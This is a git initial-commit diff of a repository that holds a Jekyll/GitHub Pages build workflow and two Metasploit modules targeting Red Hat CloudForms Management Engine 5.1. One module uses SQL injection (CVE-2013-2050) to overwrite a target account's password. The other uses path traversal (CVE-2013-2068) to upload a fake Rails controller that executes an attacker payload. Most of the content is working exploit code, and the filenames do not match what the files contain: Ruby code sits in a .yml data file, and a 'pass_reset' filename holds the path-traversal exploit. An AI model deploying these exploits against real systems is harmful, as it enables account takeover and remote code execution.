Initial commit

Author: rcvalle

.github/workflows/build.yml

@@ -0,0 +1,60 @@
+name: build
+
+on:
+  push:
+    branches: main
+
+  workflow_dispatch:
+
+jobs:
+  build:
+    name: Build
+    runs-on: ubuntu-latest
+
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v3
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+
+      - name: Setup Pages
+        uses: actions/configure-pages@v1
+
+      - name: Build
+        run: |
+          touch -a README.md
+          rm README.md
+          bundle install
+          bundle exec jekyll build
+          cp _site/README.md README.md
+
+      - name: Upload artifact
+        uses: actions/upload-pages-artifact@v1
+
+      - name: Commit
+        run: |
+          git config --global user.email "[email protected]"
+          git config --global user.name "Ramon de C Valle"
+          git add -A
+          git commit -m "Auto commit changes" || true
+          git push origin main
+
+  deploy:
+    environment:
+      name: github-pages
+      url: ${{ steps.deployment.outputs.page_url }}
+
+    name: Deploy
+    needs: build
+
+    permissions:
+      id-token: write
+      pages: write
+
+    runs-on: ubuntu-latest
+
+    steps:
+      - name: Deploy to GitHub Pages
+        id: deployment
+        uses: actions/deploy-pages@v1

.gitignore

@@ -0,0 +1,6 @@
+.bundle
+.jekyll-cache
+.sass-cache
+Gemfile.lock
+_site
+vendor

.ruby-version

@@ -0,0 +1 @@
+3.3

Gemfile

@@ -0,0 +1,2 @@
+source 'https://rubygems.org'
+gem 'jekyll'

_data/exploits.yml

@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'bcrypt'
+require 'digest'
+require 'openssl'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
+      'Description' => %q{
+          This module exploits a SQL injection vulnerability in the "explorer"
+        action of "miq_policy" controller of the Red Hat CloudForms Management
+        Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
+        changing the password of the target account to the specified password.
+      },
+      'Author' => 'Ramon de C Valle',
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2013-2050'],
+        ['CWE', '89'],
+        ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
+      ],
+      'DefaultOptions' => {
+        'SSL' => true
+      },
+      'DisclosureDate' => 'Nov 12 2013'
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'Your username']),
+        OptString.new('PASSWORD', [true, 'Your password']),
+        OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
+        OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
+        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
+        OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
+      ], self.class
+    )
+  end
+
+  def password_for_newer_schema
+    # Newer versions use ActiveModel's SecurePassword.
+    BCrypt::Password.create(datastore['TARGETPASSWORD'])
+  end
+
+  def password_for_older_schema
+    # Older versions use ManageIQ's MiqPassword.
+    if datastore['TARGETPASSWORD'].empty?
+      'v1:{}'
+    else
+      password = '1234567890123456'
+      salt = '6543210987654321'
+      cipher = OpenSSL::Cipher.new('AES-256-CBC')
+      cipher.encrypt
+      cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32]
+      encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final
+      "v1:{#{Rex::Text.encode_base64(encrypted)}}"
+    end
+  end
+
+  def password_reset?
+    print_status("Trying to log into #{target_url('dashboard')} using the target account...")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
+      'vars_post' => {
+        'user_name' => datastore['TARGETUSERNAME'],
+        'user_password' => datastore['TARGETPASSWORD']
+      }
+    )
+
+    if res.nil?
+      print_error('No response from remote host')
+      return false
+    end
+
+    if res.body =~ /"Error: (.*)"/
+      print_error(::Regexp.last_match(1))
+      false
+    else
+      true
+    end
+  end
+
+  def run
+    print_status("Logging into #{target_url('dashboard')}...")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
+      'vars_post' => {
+        'user_name' => datastore['USERNAME'],
+        'user_password' => datastore['PASSWORD']
+      }
+    )
+
+    if res.nil?
+      print_error('No response from remote host')
+      return
+    end
+
+    if res.body =~ /"Error: (.*)"/
+      print_error(::Regexp.last_match(1))
+      return
+    else
+      session = ::Regexp.last_match(1) if res.get_cookies =~ /_vmdb_session=(\h*)/
+
+      if session.nil?
+        print_error('Failed to retrieve the current session id')
+        return
+      end
+    end
+
+    # Newer versions don't accept POST requests.
+    print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...")
+    send_request_cgi(
+      'cookie' => "_vmdb_session=#{session}",
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
+      'vars_get' => {
+        'profile[]' => value_for_newer_schema
+      }
+    )
+
+    if password_reset?
+      print_good('Password reset successfully')
+      return
+    else
+      print_error('Failed to reset password')
+    end
+
+    print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...")
+    send_request_cgi(
+      'cookie' => "_vmdb_session=#{session}",
+      'method' => datastore['HTTP_METHOD'],
+      'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
+      "vars_#{datastore['HTTP_METHOD'].downcase}" => {
+        'profile[]' => value_for_older_schema
+      }
+    )
+
+    if password_reset?
+      print_good('Password reset successfully')
+    else
+      print_error('Failed to reset password')
+    end
+  end
+
+  def target_url(*args)
+    (ssl ? 'https' : 'http') +
+      if rport.to_i == 80 || rport.to_i == 443
+        "://#{vhost}"
+      else
+        "://#{vhost}:#{rport}"
+      end + normalize_uri(target_uri.path, *args)
+  end
+
+  def value_for_newer_schema
+    "1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
+  end
+
+  def value_for_older_schema
+    "1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
+  end
+end

cfme_manageiq_evm_pass_reset.rb

@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize
+    super(
+      'Name'           => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal',
+      'Description'    => %q{
+        This module exploits a path traversal vulnerability in the "linuxpkgs"
+        action of "agent" controller of the Red Hat CloudForms Management Engine 5.1
+        (ManageIQ Enterprise Virtualization Manager 5.0 and earlier).
+        It uploads a fake controller to the controllers directory of the Rails
+        application with the encoded payload as an action and sends a request to
+        this action to execute the payload. Optionally, it can also upload a routing
+        file containing a route to the action. (Which is not necessary, since the
+        application already contains a general default route.)
+      },
+      'Author'         => 'Ramon de C Valle',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2013-2068'],
+          ['CWE', '22'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=960422']
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DisclosureDate' => 'Sep 4 2013',
+      'DefaultOptions' =>
+        {
+          'PrependFork' => true,
+          'SSL' => true
+        },
+      'DefaultTarget' => 0
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('CONTROLLER', [false, 'The name of the controller']),
+        OptString.new('ACTION', [false, 'The name of the action']),
+        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
+        OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('ROUTES', [true, 'Upload a routing file. Warning: It is not necessary by default and can damage the target application', false]),
+      ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, "ping.html")
+    )
+
+    if res and res.code == 200 and res.body.to_s =~ /EVM ping response/
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    controller =
+      if datastore['CONTROLLER'].blank?
+        Rex::Text.rand_text_alpha_lower(rand(9) + 3)
+      else
+        datastore['CONTROLLER'].downcase
+      end
+
+    action =
+      if datastore['ACTION'].blank?
+        Rex::Text.rand_text_alpha_lower(rand(9) + 3)
+      else
+        datastore['ACTION'].downcase
+      end
+
+    data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n"
+
+    print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...")
+    res = upload_file("../../app/controllers/#{controller}_controller.rb", data)
+    fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
+    register_files_for_cleanup("app/controllers/#{controller}_controller.rb")
+    # According to rcvalle, all the version have not been checked
+    # so we're not sure if res.code will be always 500, in order
+    # to not lose sessions, just print warning and proceeding
+    unless res and res.code == 500
+      print_warning("Unexpected reply but proceeding anyway...")
+    end
+
+    if datastore['ROUTES']
+      data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n"
+
+      print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...")
+      res = upload_file("../../config/routes.rb", data)
+      fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
+      # According to rcvalle, all the version have not been checked
+      # so we're not sure if res.code will be always 500, in order
+      # to not lose sessions, just print warning and proceeding
+      unless res and res.code == 500
+        print_warning("Unexpected reply but proceeding anyway...")
+      end
+    end
+
+    print_status("Sending execute request to #{target_url(controller, action)}...")
+    send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, controller, action)
+    )
+  end
+
+  def upload_file(filename, data)
+    res = send_request_cgi(
+      'method' => datastore['HTTP_METHOD'],
+      'uri'    => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
+      "vars_#{datastore['HTTP_METHOD'].downcase}" => {
+        'data'     => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
+        'filename' => filename,
+        'md5'      => Rex::Text.md5(data)
+      }
+    )
+
+    return res
+  end
+
+  def target_url(*args)
+    (ssl ? 'https' : 'http') +
+      if rport.to_i == 80 || rport.to_i == 443
+        "://#{vhost}"
+      else
+        "://#{vhost}:#{rport}"
+      end + normalize_uri(target_uri.path, *args)
+  end
+end
+